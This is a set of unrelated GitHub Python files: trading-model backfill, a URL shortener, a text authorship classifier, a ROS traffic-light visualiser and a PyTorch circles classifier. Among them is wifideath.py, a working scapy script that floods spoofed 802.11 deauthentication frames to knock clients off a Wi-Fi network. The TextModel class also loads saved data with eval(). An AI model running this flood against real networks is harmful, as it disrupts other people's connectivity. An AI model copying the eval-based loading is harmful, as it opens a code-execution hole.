    return aggregateReturns, aggregatePredictions, aggregateSlippageReturns, cleanedModels
def computeReturnsForUniqueModelsCache(uniqueModels, factorToTrade):
    """Download price data for every ticker the models reference, then join
    the cached per-model return/prediction series with the daily factor
    return of ``factorToTrade``.

    Returns (cleanedModels, modelReturns, modelPredictions,
    modelSlippageReturns, returns-joined-with-factor, joinedData).
    """
    # Collect the de-duplicated set of tickers needed by any model.
    tickersRequired = []
    for mod in uniqueModels:
        print(mod.describe())
        if mod.inputSeries.targetTicker not in tickersRequired:
            tickersRequired.append(mod.inputSeries.targetTicker)
        if mod.inputSeries.series.ticker not in tickersRequired:
            tickersRequired.append(mod.inputSeries.series.ticker)
    if factorToTrade not in tickersRequired:
        tickersRequired.append(factorToTrade)
    pulledData, validTickers = dataAck.downloadTickerData(tickersRequired)
    joinedData = dataAck.joinDatasets([pulledData[ticker] for ticker in pulledData])
    modelReturns, modelPredictions, modelSlippageReturns, cleanedModels = generateAllReturnsFromCache(uniqueModels)
    # dropna() keeps only days where both model returns and the factor
    # return are available.
    return cleanedModels, modelReturns, modelPredictions, modelSlippageReturns, modelReturns.join(dataAck.getDailyFactorReturn(factorToTrade, joinedData)).dropna(), joinedData
from google.cloud import datastore, storage, logging
import time
import params
import hashlib
def checkAggregatePredictionsStored(model):
    """Return True when at least one aggregate prediction for ``model``
    exists in Datastore, False otherwise.

    Retries forever (sleeping 10s) on transient Datastore errors.
    """
    while True:
        try:
            datastore_client = datastore.Client('money-maker-1236')
            query = datastore_client.query(kind=params.aggregatePrediction)
            # Entities are keyed by a sha224 of the model description.
            query.add_filter('modelHash', '=', hashlib.sha224((str(model.describe())).encode('utf-8')).hexdigest())
            retrievedPredictions = list(query.fetch(limit=1))
            return len(retrievedPredictions) > 0
        except Exception:
            # BUG FIX: was a bare "except:", which also trapped
            # SystemExit/KeyboardInterrupt and made the retry loop
            # uninterruptible; retry only on ordinary exceptions.
            time.sleep(10)
            print("DATA SOURCE RETRIEVAL ERROR:", str(sys.exc_info()))
def runModPredictionBackfill(mod, dataToUse, backfillDays = 30):
    """Compute today's position for ``mod`` from ``dataToUse`` and persist it.

    NOTE(review): ``backfillDays`` is accepted (callers pass it) but unused
    here; only the slice of data handed in matters.
    """
    ##ENSURE POPULATED FOR CORRECT PREDICTION STYLE
    pred = dataAck.computePosition([mod.makeTodayPrediction(dataToUse)])
    print(mod.describe(), pred, dataToUse.index[-1])
    # Store the prediction keyed by the last data day used to make it.
    portfolio.storeModelPrediction(mod, pred, dataToUse.index[-1])
def runBackfillMP(mod, joinedData, threadsToUse, backfillDays = 30):
    """Backfill ~``backfillDays`` of daily predictions for ``mod`` using a
    pool of forked worker processes, then compute and store the aggregate
    prediction for each backfilled day."""
    mpEngine = mp.get_context('fork')
    # Walk backwards: i is the number of trailing rows to exclude, so
    # joinedData[:-i] reproduces the data available on each past day.
    i = mod.inputSeries.predictionPeriod - 1 + backfillDays
    runningP = []
    while i > 0:
        # Throttle: wait until the live process count drops below the cap.
        while len(runningP) > threadsToUse:
            runningP = dataAck.cycleP(runningP)
        p = mpEngine.Process(target=runModPredictionBackfill, args=(mod, joinedData[:-i], backfillDays, ))
        p.start()
        runningP.append(p)
        i -= 1
    # Drain remaining workers before aggregating.
    while len(runningP) > 0:
        runningP = dataAck.cycleP(runningP)
    print("CHECKING AGGREGATE PREDICTIONS")
    ##STORE AGGREGATE PREDICTIONS
    i = mod.inputSeries.predictionPeriod - 1 + backfillDays
    allPreds = portfolio.getPredictionsByModel(mod)
    while i > 0:
        lastDay = joinedData[:-i].index[-1]
        todayPredictions = []
        for pred in allPreds:
            ##CHECK IF PREDICTION STILL VALID
            if len(joinedData[str(pred["lastDataDayUsed"]):lastDay]) - 1 < pred["predictionLength"] and len(joinedData[str(pred["lastDataDayUsed"]):lastDay]) > 0:##GETS TRADING DAYS SINCE LAST DATA DAY
                todayPredictions.append(pred["prediction"])
        ##SKIP UPLOAD IF NOT ENOUGH PREDICTIONS
        print(lastDay, len(todayPredictions))
        # Only store an aggregate when one prediction exists for every day
        # of the model's prediction period.
        if len(todayPredictions) == mod.inputSeries.predictionPeriod:
            pred = dataAck.computePosition(todayPredictions)
            print(mod.describe(), todayPredictions, pred)
            portfolio.storeAggregateModelPrediction(mod, pred, lastDay)
        i -= 1
def returnSelectAlgos(algoColumns):
    """Randomly pick between 7 and len(algoColumns) distinct algorithm columns."""
    sampleSize = random.randint(7, len(algoColumns))
    return np.random.choice(algoColumns, size=sampleSize, replace=False)
# import matplotlib.pyplot as plt
import time
import random
def performPortfolioPerformanceEstimation(thisPredictions, thisReturns, hashToModel, joinedData):
    """Build an HRP portfolio from the selected model returns, persist its
    description, historical allocations and cached performance data."""
    # Hierarchical-risk-parity weights over a 126-day rolling window.
    hrpReturns, historicalWeights = portfolioGeneration.\
    produceHRPPredictions(thisReturns,\
    126, startIndex=None, maxWindowSize=False)
    print("COMPUTED HISTORICAL WEIGHTS")
    modelsUsed = []
    tickersSeen = {}
    # Map each prediction column (model hash) back to its model object and
    # count how many models trade each target ticker.
    for modelHash in thisPredictions.columns:
        thisModel = hashToModel[modelHash]
        modelsUsed.append(thisModel)
        print(thisModel.describe())
        if thisModel.inputSeries.targetTicker not in tickersSeen:
            tickersSeen[thisModel.inputSeries.targetTicker] = 0
        tickersSeen[thisModel.inputSeries.targetTicker] += 1
    ##STORE MODEL
    portfolioHash = portfolioGeneration.storePortfolio(modelsUsed,\
    description=str(tickersSeen), benchmark="SPY", portfolioType="HRP FULL")
    portfolioGeneration.storeHistoricalAllocations(portfolioHash, \
    modelsUsed, historicalWeights, thisPredictions)
    portfolioInfo = portfolio.getPortfolioByKey(portfolioHash)
    # Flatten the datastore entity into a plain dict for caching.
    portfolioInfo = {
        "key":portfolioInfo.key.name,
        "description":portfolioInfo["description"],
        "benchmark":portfolioInfo["benchmark"],
        "portfolioType":portfolioInfo["portfolioType"],
        "startedTrading":portfolioInfo["startedTrading"]
    }
    print(portfolioInfo)
    portfolioData = portfolioGeneration.getDataForPortfolio(portfolioHash, portfolioInfo["benchmark"], joinedData, portfolioInfo["startedTrading"])
    portfolioGeneration.cachePortfolio(portfolioInfo, portfolioData, params.AVAILABLE_MODE)
## MP RUN
def createPossiblePortfoliosMP(cleanedPredictions, cleanedReturns, hashToModel, joinedData, threadsToUse):
    """Endlessly sample random algorithm subsets and evaluate each candidate
    portfolio in its own forked process, keeping at most ``threadsToUse``
    workers alive at once.

    NOTE(review): this loop never terminates on its own; it is intended to
    run as a long-lived search job and be stopped externally.
    """
    mpEngine = mp.get_context('fork')
    runningP = []
    while True:
        selectedAlgorithms = returnSelectAlgos(cleanedReturns.columns)
        # Throttle: recycle finished processes until below the cap.
        while len(runningP) > threadsToUse:
            runningP = dataAck.cycleP(runningP)
        p = mpEngine.Process(target=performPortfolioPerformanceEstimation, args=(cleanedPredictions[selectedAlgorithms], cleanedReturns[selectedAlgorithms], hashToModel, joinedData, ))
        p.start()
        runningP.append(p)
| SignalBuilders/walkforwardTrader | autoPortfolio.py | autoPortfolio.py | py | 7,694 | python | en | code | 1 | github-code | 13 |
27194590006 | # Url Shortner
import streamlit as st
import pyshorteners
import clipboard
def shorten_url(url):
    """Return a TinyURL short link for *url*."""
    return pyshorteners.Shortener().tinyurl.short(url)
# Streamlit app: single text input + button that shortens the URL and
# copies the result to the system clipboard.
st.title("URL Shortener")
url_to_shorten = st.text_input("Enter the URL to shorten")
# Button to shorten the URL
if st.button("Shorten"):
    if url_to_shorten:
        shortened_url = shorten_url(url_to_shorten)
        # Copy the short link so the user can paste it immediately.
        clipboard.copy(shortened_url)
        st.success("Shortened URL:")
        st.write(shortened_url)
        st.info("The shortened URL has been copied to the clipboard.")
    else:
        st.warning("Please enter a URL to shorten.")
72436265937 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 22 15:56:48 2020
@author: cartervandemoore
"""
#create an initial version of a TextModel class,
#which will serve as a blueprint for objects that model a body of text
import math
#returns a list of words after 'cleaning' out a string txt
def clean_text(txt):
    """Return the lowercased words of *txt* with punctuation removed.

    Strips the characters . , ? ! ; : " in one translate() pass (instead of
    seven chained replace() calls) and splits on single spaces; consecutive
    spaces therefore yield empty strings, matching the original behavior
    that the rest of the module relies on.
    """
    cleaned = txt.lower().translate(str.maketrans('', '', '.,?!;:"'))
    return cleaned.split(" ")
#returns the stem / root of a given word
def stem(s):
    """Return a crude stem / root of the word *s*.

    Heuristics: strip a trailing plural 's' (except for '-ies' words),
    strip the prefixes un/dis/non/mis, strip '-ing' (handling doubled
    consonants), strip '-er', and rewrite '-ies' to '-y'.
    """
    # BUG FIX: the original tested `s[-3] != "ies"`, comparing a single
    # character to a 3-character string (always True), so '-ies' plurals
    # lost their final 's' and never reached the 'ies' -> 'y' rewrite below
    # (e.g. stem("parties") returned "partie" instead of "party").
    if len(s)>4 and s[-1]=="s" and s[-3:]!="ies":
        s=s[:-1]
    if len(s)>4 and s[:2]=="un":
        s=s[2:]
    elif len(s)>4 and s[:3]=="dis":
        s=s[3:]
    elif len(s)>4 and s[:3]=="non":
        s=s[3:]
    elif len(s)>4 and s[:3]=="mis":
        s=s[3:]
    if len(s)>5 and s[-3:] == 'ing':
        # Doubled final consonant (e.g. "running" -> "run"), except 'll'
        # (e.g. "calling" -> "call").
        if s[-4] == s[-5] and s[-4]!="l":
            s = s[:-4]
        elif s[-4] == s[-5] and s[-4]=="l":
            s = s[:-3]
        else:
            s = s[:-3]
    elif s[-2:] == 'er':
        if(len(s[:-2])==4):
            s = s[:-2]
        else:
            s = s[:-3]
    elif len(s)>4 and s[-3:] == 'ies':
        s=s[:-3]
        s=s+"y"
    return s
#returns the similarity score of two dictionaries
def compare_dictionaries(d1, d2):
    """Return the log-similarity score of d2's counts against model d1.

    Each word in d2 contributes count * log(P(word)), where P(word) is its
    frequency in d1 (or 0.5/total for unseen words).  A total of 0 or 1 is
    bumped to 1.01 to keep the probabilities well-defined.
    """
    total = sum(d1.values())
    if total in (0, 1):
        total = 1.01
    score = 0
    for word in d2:
        numerator = d1[word] if word in d1 else 0.5
        score += d2[word] * math.log(numerator / total)
    return score
class TextModel():
    """Statistical model of a body of text.

    Tracks five feature dictionaries (word counts, word-length counts, stem
    counts, sentence-length counts and coordinating-conjunction counts) and
    can compare itself to other models to guess authorship.
    """
    def __init__(self, model_name):
        """Create an empty model labelled ``model_name``."""
        self.name=model_name
        self.words={}
        self.word_lengths={}
        self.stems={}
        self.sentence_lengths={}
        self.conjunctions={}
    def __repr__(self):
        """Return a string representation of the TextModel."""
        s = 'text model name: ' + self.name + '\n'
        s += ' number of words: ' + str(len(self.words)) + '\n'
        s += ' number of word lengths: ' + str(len(self.word_lengths)) + '\n'
        s += ' number of stems: ' + str(len(self.stems)) + '\n'
        s += ' number of sentence lengths: ' + str(len(self.sentence_lengths)) + '\n'
        s += ' the number of coordinating conjunctions is: ' + str(len(self.conjunctions)) + '\n'
        return s
    def add_string(self, s):
        """Analyzes the string s and adds its pieces
        to all of the dictionaries in this text model."""
        # Sentence length = number of words, approximated by counting the
        # spaces since the previous sentence terminator.
        s_length=1
        for c in s:
            if c==" ":
                s_length+=1
            elif "." in c or "!" in c or "?" in c:
                if s_length not in self.sentence_lengths:
                    self.sentence_lengths[s_length]=1
                else:
                    self.sentence_lengths[s_length]+=1
                s_length=0
        word_list=clean_text(s)
        for w in word_list:
            if w not in self.words:
                self.words[w]=1
            else:
                self.words[w]+=1
            if len(w) not in self.word_lengths:
                self.word_lengths[len(w)]=1
            else:
                self.word_lengths[len(w)]+=1
            if stem(w) not in self.stems:
                self.stems[stem(w)]=1
            else:
                self.stems[stem(w)]+=1
            # BUG FIX: the original tested `w in "for and nor but or yet so"`,
            # which is *substring* membership and therefore also counted
            # words like 'a', 'an', 'o' and even the empty string as
            # conjunctions; test membership in the explicit set instead.
            if w in {"for", "and", "nor", "but", "or", "yet", "so"}:
                if w not in self.conjunctions:
                    self.conjunctions[w]=1
                else:
                    self.conjunctions[w]+=1
    def add_file(self, filename):
        """Adds all of the text in the file identified by filename to the model."""
        f = open(filename, 'r', encoding='utf8', errors='ignore')
        text = f.read()  # read it all in at once!
        f.close()
        self.add_string(text)
    def save_model(self):
        """Saves the TextModel object self by writing its various
        feature dictionaries to files named '<model name>_<feature>'."""
        d = self.words
        f = open(self.name + '_' + 'words', 'w')         # Open file for writing.
        f.write(str(d))                                  # Writes the dictionary to the file.
        f.close()                                        # Close the file.
        d1 = self.word_lengths
        f = open(self.name + '_' + 'word_lengths', 'w')  # Open file for writing.
        f.write(str(d1))                                 # Writes the dictionary to the file.
        f.close()                                        # Close the file.
        d2 = self.stems
        f = open(self.name + '_' + 'stems', 'w')         # Open file for writing.
        f.write(str(d2))                                 # Writes the dictionary to the file.
        f.close()
        d3 = self.sentence_lengths
        f = open(self.name + '_' + 'sentence_lengths', 'w')  # Open file for writing.
        f.write(str(d3))                                 # Writes the dictionary to the file.
        f.close()
        d4 = self.conjunctions
        f = open(self.name + '_' + 'conjunctions', 'w')  # Open file for writing.
        f.write(str(d4))                                 # Writes the dictionary to the file.
        f.close()
    def read_model(self):
        """Reads the stored dictionaries for the called TextModel object from
        their files and assigns them to the attributes of the called TextModel."""
        f = open(self.name + '_' + 'words', 'r')         # Open for reading.
        d_str = f.read()                                 # Read in a string that represents a dict.
        f.close()
        self.words = dict(eval(d_str))                   # Convert the string to a dictionary.
        f = open(self.name + '_' + 'word_lengths', 'r')  # Open for reading.
        d1_str = f.read()                                # Read in a string that represents a dict.
        f.close()
        self.word_lengths = dict(eval(d1_str))           # Convert the string to a dictionary.
        f = open(self.name + '_' + 'stems', 'r')         # Open for reading.
        d2_str = f.read()                                # Read in a string that represents a dict.
        f.close()
        self.stems = dict(eval(d2_str))                  # Convert the string to a dictionary.
        f = open(self.name + '_' + 'sentence_lengths', 'r')  # Open for reading.
        d3_str = f.read()                                # Read in a string that represents a dict.
        f.close()
        self.sentence_lengths = dict(eval(d3_str))       # Convert the string to a dictionary.
        f = open(self.name + '_' + 'conjunctions', 'r')  # Open for reading.
        d4_str = f.read()                                # Read in a string that represents a dict.
        f.close()
        self.conjunctions = dict(eval(d4_str))           # Convert the string to a dictionary.
    def similarity_scores(self, other):
        """Computes and returns a list of log similarity scores measuring the
        similarity of self and other -- one score for each type of feature
        (words, word lengths, stems, sentence lengths, conjunctions)."""
        list1=[compare_dictionaries(other.words, self.words)]
        list2=[compare_dictionaries(other.word_lengths, self.word_lengths)]
        list3=[compare_dictionaries(other.stems, self.stems)]
        list4=[compare_dictionaries(other.sentence_lengths, self.sentence_lengths)]
        list5=[compare_dictionaries(other.conjunctions, self.conjunctions)]
        ans=list1+list2+list3+list4+list5
        return ans
    def classify(self, source1, source2):
        """Compares the called TextModel object (self) to two other "source"
        TextModel objects (source1 and source2) and prints which of them is
        the more likely source of the called TextModel (majority vote over
        the five per-feature similarity scores)."""
        scores1 = self.similarity_scores(source1)
        scores2 = self.similarity_scores(source2)
        print("scores for "+source1.name+": "+str(scores1))
        print("scores for "+source2.name+": "+str(scores2))
        total1=0
        total2=0
        for x in range(len(scores1)):
            if scores1[x]>scores2[x]:
                total1+=1
            elif scores2[x]>scores1[x]:
                total2+=1
        if total1>total2:
            print(str(self.name)+" is more likely to have come from "+str(source1.name))
        else:
            print(str(self.name)+" is more likely to have come from "+str(source2.name))
def test():
    """Smoke test: classify one small mystery string against two tiny sources."""
    first_source = TextModel('source1')
    first_source.add_string('It is interesting that she is interested.')
    second_source = TextModel('source2')
    second_source.add_string('I am very, very excited about this!')
    unknown = TextModel('mystery')
    unknown.add_string('Is he interested? No, but I am.')
    unknown.classify(first_source, second_source)
def run_tests():
    """Classify four full texts against the Saunders and Poe source models."""
    saunders_model = TextModel('TenthOfDecemberPart1')
    saunders_model.add_file('TenthOfDecemberPart1.txt')
    poe_model = TextModel('TheTellTaleHeartPart1')
    poe_model.add_file('TheTellTaleHeartPart1.txt')
    candidate_names = [
        'TellTaleHeartPart2',
        'TenthOfDecemberPart2',
        'TheRaven',
        'HanselAndGretel',
    ]
    for candidate_name in candidate_names:
        candidate = TextModel(candidate_name)
        candidate.add_file(candidate_name + '.txt')
        candidate.classify(saunders_model, poe_model)
| cvmoore/authorFinder | TextMatching2.py | TextMatching2.py | py | 10,075 | python | en | code | 0 | github-code | 13 |
37630967052 | #! /usr/bin/env python3
import rospy
from visualization_msgs.msg import Marker
from visualization_msgs.msg import MarkerArray
from geometry_msgs.msg import Point
import numpy as np
class Traffic_Light_Marker_Array:
def __init__(self, stopline=None):
self.mark_array = MarkerArray()
self.lights_attr = dict()
if stopline is None:
self.x = 0
self.y = 0
self.z = 0
self.unit_vector = (1,0,0)
else:
self.x = stopline[0]
self.y = stopline[1]
self.z = stopline[2]
stopline_vector = (stopline[3] - stopline[0], stopline[4] - stopline[1], stopline[5] - stopline[2])
self.unit_vector = stopline_vector / np.linalg.norm(stopline_vector)
#print(f"{self.unit_vector}")
#self.unit_vector = __getUnitVector(stopline[0], stopline[1],stopline[2],stopline[3], stopline[4],stopline[5])
self.light_radius = 1
self.light_pole_radius = 0.3
self.light_pole_hight = 10
self.light_pole = Point(self.x - self.light_pole_radius * self.unit_vector[0], self.y - self.light_pole_radius * self.unit_vector[1], self.z + (self.light_pole_hight / 2))
self.red_light = Point(
self.x + self.light_radius * self.unit_vector[0],
self.y + self.light_radius * self.unit_vector[1],
self.z + self.light_pole_hight + self.light_radius * self.unit_vector[2])
self.yellow_light = Point(
self.red_light.x + self.light_radius * self.unit_vector[0],
self.red_light.y + self.light_radius * self.unit_vector[1],
self.red_light.z + self.light_radius * self.unit_vector[2])
self.green_light = Point(
self.yellow_light.x + self.light_radius * self.unit_vector[0],
self.yellow_light.y + self.light_radius * self.unit_vector[1],
self.yellow_light.z + self.light_radius * self.unit_vector[2])
self.green_left = Point(
self.yellow_light.x + self.light_radius * self.unit_vector[0],
self.yellow_light.y + self.light_radius * self.unit_vector[1],
self.yellow_light.z + self.light_radius * self.unit_vector[2])
self.green_strait = Point(
self.green_left.x + self.light_radius * self.unit_vector[0],
self.green_left.y + self.light_radius * self.unit_vector[1],
self.green_left.z + self.light_radius * self.unit_vector[2])
self.green_right = Point(
self.green_strait.x + self.light_radius * self.unit_vector[0],
self.green_strait.y + self.light_radius * self.unit_vector[1],
self.green_strait.z + self.light_radius * self.unit_vector[2])
self.count_down = Point(
self.green_right.x + self.light_radius * self.unit_vector[0],
self.green_right.y + self.light_radius * self.unit_vector[1],
self.green_right.z + self.light_radius * self.unit_vector[2])
self.lights_attr["r"] = {"id": 1, "pose": self.red_light, "on": (1.0, 0.0, 0.0), "off": (0.3, 0.0, 0.0)}
self.lights_attr["y"] = {"id": 2, "pose": self.yellow_light, "on": (1.0, 1.0, 0.0), "off": (0.3, 0.3, 0.0)}
self.lights_attr["g"] = {"id": 3, "pose": self.green_light, "on": (0.0, 1.0, 0.0), "off": (0.0, 0.3, 0.0)}
self.lights_attr["g_l"] = {"id": 11, "pose": self.green_left, "on": (0.0, 1.0, 0.0), "off": (0.0, 0.3, 0.0)}
self.lights_attr["g_s"] = {"id": 12, "pose": self.green_strait, "on": (0.0, 1.0, 0.0), "off": (0.0, 0.3, 0.0)}
self.lights_attr["g_r"] = {"id": 13, "pose": self.green_right, "on": (0.0, 1.0, 0.0), "off": (0.0, 0.3, 0.0)}
'''
self.green_left = {
"x_tip": {"x": self.yellow_light["x"] + self.light_radius * 3, "y": self.y, "z": self.light_pole_hight},
"x_tail": {"x": self.yellow_light["x"] + self.light_radius, "y": self.y, "z": self.light_pole_hight}
}
self.green_straight = {
"x_tip": {"x": self.green_left["x_tip"]["x"] + self.light_radius * 2, "y": self.y, "z": self.light_pole_hight - self.light_radius},
"x_tail": {"x":self.green_left["x_tip"]["x"] + self.light_radius * 2, "y":self.y, "z": self.light_pole_hight + self.light_radius},
}
self.green_right = {
"x_tip": {"x": self.green_straight["x_tip"]["x"] + self.light_radius , "y": self.y, "z": self.light_pole_hight},
"x_tail": {"x":self.green_straight["x_tip"]["x"] + self.light_radius * 3, "y":self.y, "z": self.light_pole_hight},
}
'''
#self.count_down ={"x": self.green_right["x_tail"]["x"] + self.light_radius, "y": self.y, "z": self.light_pole_hight}
def __getUnitVector(self, x0, y0, x1, y1):
distance = ((x0 - x1)**2 + (y0 -y1)**2)**0.5
return ((x1 -x0)/distance, (y1 - y0)/distance)
def __draw_light_pole(self):
lampole = Marker()
lampole.header.frame_id = "/map"
lampole.header.stamp = rospy.Time.now()
lampole.type = 3
lampole.id = 6
# Set the scale of the marker
lampole.scale.x = self.light_pole_radius
lampole.scale.y = self.light_pole_radius
lampole.scale.z = self.light_pole_hight
# Set the color
lampole.color.r = 0.7
lampole.color.g = 0.7
lampole.color.b = 0.7
lampole.color.a = 1.0
# Set the pose of the marker
lampole.pose.position.x = self.light_pole.x
lampole.pose.position.y = self.light_pole.y
lampole.pose.position.z = self.light_pole.z
lampole.pose.orientation.x = 0.0
lampole.pose.orientation.y = 0.0
lampole.pose.orientation.z = 0.0
lampole.pose.orientation.w = 1.0
#print("lampole")
#print(lampole)
self.mark_array.markers.append(lampole)
def __draw_light(self, color, on):
light = Marker()
light.header.frame_id = "/map"
light.header.stamp = rospy.Time.now()
print(f"{color} {on}")
# set shape, Arrow: 0; Cube: 1 ; Sphere: 2 ; Cylinder: 3
light.type = 2
light.id = light.color.r = self.lights_attr[color]["id"]
# Set the color
light.color.r = self.lights_attr[color]["on"][0] if on else self.lights_attr[color]["off"][0]
light.color.g = self.lights_attr[color]["on"][1] if on else self.lights_attr[color]["off"][1]
light.color.b = self.lights_attr[color]["on"][2] if on else self.lights_attr[color]["off"][2]
light.color.a = 1.0
# Set the scale of the marker
light.scale.x = 1.0
light.scale.y = 1.0
light.scale.z = 1.0
# Set the pose of the marker
light.pose.position.x = self.lights_attr[color]["pose"].x
light.pose.position.y = self.lights_attr[color]["pose"].y
light.pose.position.z = self.lights_attr[color]["pose"].z
light.pose.orientation.x = 0.0
light.pose.orientation.y = 0.0
light.pose.orientation.z = 0.0
light.pose.orientation.w = 1.0
#print("light" + color)
#print(light)
self.mark_array.markers.append(light)
def __draw_coutdown(self, sec):
countdowan_text = Marker()
countdowan_text.header.frame_id = "/map"
countdowan_text.header.stamp = rospy.Time.now()
# set shape, Arrow: 0; Cube: 1 ; Sphere: 2 ; Cylinder: 3
countdowan_text.type = 9
countdowan_text.id = 7
# Set the scale of the marker
countdowan_text.scale.z = 1.0
countdowan_text.text = str(sec)
# Set the color
countdowan_text.color.r = 1.0
countdowan_text.color.g = 1.0
countdowan_text.color.b = 1.0
countdowan_text.color.a = 1.0
# Set the pose of the marker
countdowan_text.pose.position.x = self.count_down.x
countdowan_text.pose.position.y = self.count_down.y
countdowan_text.pose.position.z = self.count_down.z
countdowan_text.pose.orientation.x = 0.0
countdowan_text.pose.orientation.y = 0.0
countdowan_text.pose.orientation.z = 0.0
countdowan_text.pose.orientation.w = 1.0
self.mark_array.markers.append(countdowan_text)
def __draw_arrow(self, direction, on):
direction_const = dict()
arrow = Marker()
arrow.header.frame_id = "/map"
arrow.header.stamp = rospy.Time.now()
# set shape, Arrow: 0; Cube: 1 ; Sphere: 2 ; Cylinder: 3
arrow.type = 0
arrow.id = self.lights_attr[direction]["id"]
# Set the scale of the marker
arrow.scale.x = 0.3
arrow.scale.y = 0.5
arrow.scale.z = 0.0
# Set the color
arrow.color.r = self.lights_attr[direction]["on"][0] if on else self.lights_attr[direction]["off"][0]
arrow.color.g = self.lights_attr[direction]["on"][1] if on else self.lights_attr[direction]["off"][1]
arrow.color.b = self.lights_attr[direction]["on"][2] if on else self.lights_attr[direction]["off"][2]
arrow.color.a = 1.0
head = None
tail = None
if direction == "g_l":
head = Point(self.lights_attr[direction]["pose"].x - 0.5 * self.light_radius * self.unit_vector[0],
self.lights_attr[direction]["pose"].y - 0.5 * self.light_radius * self.unit_vector[1],
self.lights_attr[direction]["pose"].z - 0.5 * self.light_radius * self.unit_vector[2])
tail = Point(self.lights_attr[direction]["pose"].x + 0.5 * self.light_radius * self.unit_vector[0],
self.lights_attr[direction]["pose"].y + 0.5 * self.light_radius * self.unit_vector[1],
self.lights_attr[direction]["pose"].z + 0.5 * self.light_radius * self.unit_vector[2])
elif direction == "g_r":
head = Point(self.lights_attr[direction]["pose"].x + 0.5 * self.light_radius * self.unit_vector[0],
self.lights_attr[direction]["pose"].y + 0.5 * self.light_radius * self.unit_vector[1],
self.lights_attr[direction]["pose"].z + 0.5 * self.light_radius * self.unit_vector[2])
tail = Point(self.lights_attr[direction]["pose"].x - 0.5 * self.light_radius * self.unit_vector[0],
self.lights_attr[direction]["pose"].y - 0.5 * self.light_radius * self.unit_vector[1],
self.lights_attr[direction]["pose"].z - 0.5 * self.light_radius * self.unit_vector[2])
elif direction == "g_s":
head = Point(self.lights_attr[direction]["pose"].x,
self.lights_attr[direction]["pose"].y,
self.lights_attr[direction]["pose"].z + 0.5)
tail = Point(self.lights_attr[direction]["pose"].x,
self.lights_attr[direction]["pose"].y,
self.lights_attr[direction]["pose"].z - 0.5)
arrow.points = [tail, head]
arrow.pose.orientation.x = 0.0
arrow.pose.orientation.y = 0.0
arrow.pose.orientation.z = 0.0
arrow.pose.orientation.w = 1.0
self.mark_array.markers.append(arrow)
    def dump_marker_array(self, r=0, y=0, g=0, g_l=0, g_s=0, g_r=0, sec=99):
        """Build and return the MarkerArray for the given light state.

        Args:
            r, y, g: red / yellow / green bulb flags (0/1, int or str).
            g_l, g_s, g_r: green left / straight / right arrow flags.
            sec: countdown value to render (defaults to 99).

        NOTE(review): markers are appended to ``self.mark_array`` on every
        call and no reset is visible in this method — repeated calls may
        grow the array without bound; confirm the ``__draw_*`` helpers
        clear it first.
        """
        print("+++++++++++++++++++++++")
        # Debug traces of the raw inputs (the second line prints constants).
        print(f"{r} {y} {g} ")
        print(f"{bool(1)} {bool(0)} {bool(0)} ")
        self.__draw_light_pole()
        self.__draw_light("r", bool(int(r)))
        self.__draw_light("y", bool(int(y)))
        #self.__draw_light("g", bool(int(g)))
        self.__draw_arrow("g_l", bool(int(g_l)))
        self.__draw_arrow("g_s", bool(int(g_s)))
        self.__draw_arrow("g_r", bool(int(g_r)))
        self.__draw_coutdown(sec)
        # Debug dump of the full marker array before returning it.
        print(self.mark_array)
        return self.mark_array
    def turn_on(self, color):
        """Placeholder: switch the bulb of the given color on (not implemented)."""
        pass
    def turn_off(self, color):
        """Placeholder: switch the bulb of the given color off (not implemented)."""
        pass
    def flashing(self, color):
        """Placeholder: flash the bulb of the given color (not implemented)."""
        pass
if __name__ == '__main__':
    rospy.init_node('rviz_marker')
    # Stop line given as two 3-D endpoints: (x1, y1, z1, x2, y2, z2).
    stop_line = [1587.7426, 45506.1915, 66.5132, 1587.553, 45505.8394, 66.5042]
    traffic_light = Traffic_Light_Marker_Array(stop_line)
    # NOTE(review): this debug print already runs dump_marker_array() once,
    # which appends a full set of markers before the publish loop below.
    print(f"{traffic_light.dump_marker_array()}")
    marker_pub = rospy.Publisher("/my_marker", MarkerArray, queue_size = 2)
    while not rospy.is_shutdown():
        # Re-publish the marker array roughly once per second.
        marker_pub.publish(traffic_light.dump_marker_array())
        rospy.rostime.wallsleep(1.0)
| wasn-lab/Taillight_Recognition_with_VGG16-WaveNet | src/utilities/rviz_traffic_light/src/Traffic_light.py | Traffic_light.py | py | 12,637 | python | en | code | 2 | github-code | 13 |
29382549925 | #!/usr/bin/env python
import sys
import logging
import scapy.all as scapy
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
def broadcast_flood(interface, bssid):
packet = scapy.Dot11(
addr1='ff:ff:ff:ff:ff:ff',
addr2=bssid,
addr3=bssid
) / scapy.Dot11Deauth()
scapy.sendp(packet, iface=interface, loop=1, verbose=0)
def main():
if len(sys.argv) != 3:
print('%s <Interface> <BSSID>' % sys.argv[0])
sys.exit(1)
print('Flooding is started...')
broadcast_flood(sys.argv[1], sys.argv[2])
if __name__ == '__main__':
main()
| vodkabears/wifideath | wifideath.py | wifideath.py | py | 605 | python | en | code | 4 | github-code | 13 |
5264297756 | import torch
from torch import nn
import matplotlib.pyplot as plt
import requests
from pathlib import Path
from sklearn.datasets import make_circles
from sklearn.model_selection import train_test_split
import pandas as pd
# number of samples
n = 1000
#create circles
X, y = make_circles(n,
noise=0.01,
random_state=69)
print(f"X.shape: {X.shape}, y.shape: {y.shape}")
# print(f"first 5 samples: {X[:5], y[:5]}")
# make dataframe of circles
circles = pd.DataFrame({"X1": X[:,0],
"X2": X[:,1],
"label":y })
print(circles.head(10))
# print(circles.label.value_counts()) # How many values of each class is there?
# visualise the data
plt.scatter(x=X[:,0],
y=X[:,1],
c=y,
cmap=plt.cm.RdYlBu)
# plt.show()
# turning data into tensors
X = torch.from_numpy(X).type(torch.float) # and also changed the dtype
y = torch.from_numpy(y).type(torch.float)
# print(X[:10], y[:10])
# splitting the data into test and train sets
X_train, X_test, y_train, y_test = train_test_split(X,
y,
test_size=0.2,
random_state=69)
print(f"X_train.shape: {X_train.shape}, X_test.shape: {X_test.shape}, y_train.shape: {y_train.shape}, y_test.shape: {y_test.shape} ")
# make the code device agnostic
device = "cuda" if torch.cuda.is_available() else "cpu"
# print(f"Available device: {device}")
### Building the model
# Just with linear activations
class BinaryClassification_v01(nn.Module):
    """Two-layer purely linear classifier for the circles data.

    Maps 2-D points to a single raw logit. There is no non-linearity
    between the layers, so the whole network collapses to one affine map
    and can only learn a linear decision boundary.
    """

    def __init__(self):
        super().__init__()
        # Hidden projection: 2 input features -> 10 hidden units.
        self.layer1 = nn.Linear(2, 10)
        # Output head: 10 hidden units -> 1 logit.
        self.layer2 = nn.Linear(10, 1)

